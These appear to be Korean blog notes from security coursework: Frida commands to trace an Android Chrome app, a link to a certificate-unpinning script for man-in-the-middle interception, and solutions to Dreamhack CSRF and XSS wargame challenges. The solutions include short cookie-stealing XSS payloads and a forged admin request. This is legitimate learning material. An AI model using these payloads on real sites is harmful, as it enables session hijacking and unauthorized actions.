2025.04.15
Frida trace
frida-trace -i "open" -U com.android.chromechrome 애플리케이션 open 함수 추적
frida-trace -U -F -j '*!onClick'
MITM
https://codeshare.frida.re/@akabe1/frida-multiple-unpinning/
| 정보 보안 과제 3 (0) | 2025.04.10 |
|---|---|
| 정보보안 수업 과제용2 (0) | 2025.04.10 |
| 보안 실무 관련 주요 용어, 백엔드 보안 관련 면접 대비 용어 (0) | 2025.03.13 |
| 2025 보안 트렌드와 AI 관련 이슈 (0) | 2025.03.13 |
| 2024 연말정산 / 2025 계획 (0) | 2024.12.17 |
csrf-1
/admin/notice_flag 엔드포인트는 내부망에서만 접근 가능
<img src=/admin/notice_flag?userid=admin>| Frida (0) | 2025.04.15 |
|---|---|
| 정보보안 수업 과제용2 (0) | 2025.04.10 |
| 보안 실무 관련 주요 용어, 백엔드 보안 관련 면접 대비 용어 (0) | 2025.03.13 |
| 2025 보안 트렌드와 AI 관련 이슈 (0) | 2025.03.13 |
| 2024 연말정산 / 2025 계획 (0) | 2024.12.17 |
드림핵 XSS-1
사용자가 url을 서버에 제출하면 셀레니움으로 구현된 봇이 해당 url에 접속한다.
이 때 cookie값에 FLAG가 들어있으므로 XSS로 다음과 같이 memo 파라미터로 cookie값을 넘겨주게되면 FLAG를 얻을 수 있다.
<script>
document.location.href = `/memo?memo=${document.cookie}`;
</script>
드림핵 XSS-2
innerHTML로 들어간 script 태그는 실행되지 않기 때문에 img 태그로 했다.
<img src="#" onerror="location.href='/memo?memo='+document.cookie">| Frida (0) | 2025.04.15 |
|---|---|
| 정보 보안 과제 3 (0) | 2025.04.10 |
| 보안 실무 관련 주요 용어, 백엔드 보안 관련 면접 대비 용어 (0) | 2025.03.13 |
| 2025 보안 트렌드와 AI 관련 이슈 (0) | 2025.03.13 |
| 2024 연말정산 / 2025 계획 (0) | 2024.12.17 |